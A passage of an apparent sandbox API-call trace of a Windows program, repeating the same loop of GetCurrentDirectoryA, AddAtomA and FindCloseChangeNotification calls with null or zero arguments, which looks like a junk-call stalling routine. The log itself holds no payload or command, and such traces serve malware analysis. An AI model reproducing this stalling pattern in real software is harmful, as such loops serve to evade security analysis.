nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.054] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.054] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.054] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.054] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.054] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.054] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.054] AddAtomA (lpString=0x0) returned 0x0 [0112.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.055] AddAtomA (lpString=0x0) returned 0x0 [0112.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.056] AddAtomA (lpString=0x0) returned 0x0 [0112.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.056] AddAtomA (lpString=0x0) returned 0x0 [0112.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.056] AddAtomA (lpString=0x0) returned 0x0 [0112.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.056] AddAtomA (lpString=0x0) returned 0x0 [0112.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.056] AddAtomA (lpString=0x0) returned 0x0 [0112.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.056] AddAtomA (lpString=0x0) returned 0x0 [0112.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.056] AddAtomA (lpString=0x0) returned 0x0 [0112.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.057] AddAtomA (lpString=0x0) returned 0x0 [0112.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.058] AddAtomA (lpString=0x0) returned 0x0 [0112.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.058] AddAtomA (lpString=0x0) returned 0x0 [0112.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.058] AddAtomA (lpString=0x0) returned 0x0 [0112.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.058] AddAtomA (lpString=0x0) returned 0x0 [0112.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.058] AddAtomA (lpString=0x0) returned 0x0 [0112.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.058] AddAtomA (lpString=0x0) returned 0x0 [0112.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.058] AddAtomA (lpString=0x0) returned 0x0 [0112.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.059] AddAtomA (lpString=0x0) returned 0x0 [0112.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.060] AddAtomA (lpString=0x0) returned 0x0 [0112.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.060] AddAtomA (lpString=0x0) returned 0x0 [0112.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.060] AddAtomA (lpString=0x0) returned 0x0 [0112.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.062] AddAtomA (lpString=0x0) returned 0x0 [0112.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.062] AddAtomA (lpString=0x0) returned 0x0 [0112.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.062] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.063] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.063] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.063] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.063] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.063] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.063] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.063] AddAtomA (lpString=0x0) returned 0x0 [0112.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.064] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.065] AddAtomA (lpString=0x0) returned 0x0 [0112.065] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.065] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.065] AddAtomA (lpString=0x0) returned 0x0 [0112.065] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.066] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.066] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.066] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.066] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.066] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.066] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.066] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.066] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.066] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.067] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.067] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.067] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.068] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.068] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.068] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.068] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.068] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.068] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.068] AddAtomA (lpString=0x0) returned 0x0 [0112.068] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.068] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.069] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.069] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.069] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.069] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.069] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.069] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.069] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.069] AddAtomA (lpString=0x0) returned 0x0 [0112.069] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.070] AddAtomA (lpString=0x0) returned 0x0 [0112.070] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.070] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.071] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.071] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.071] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] 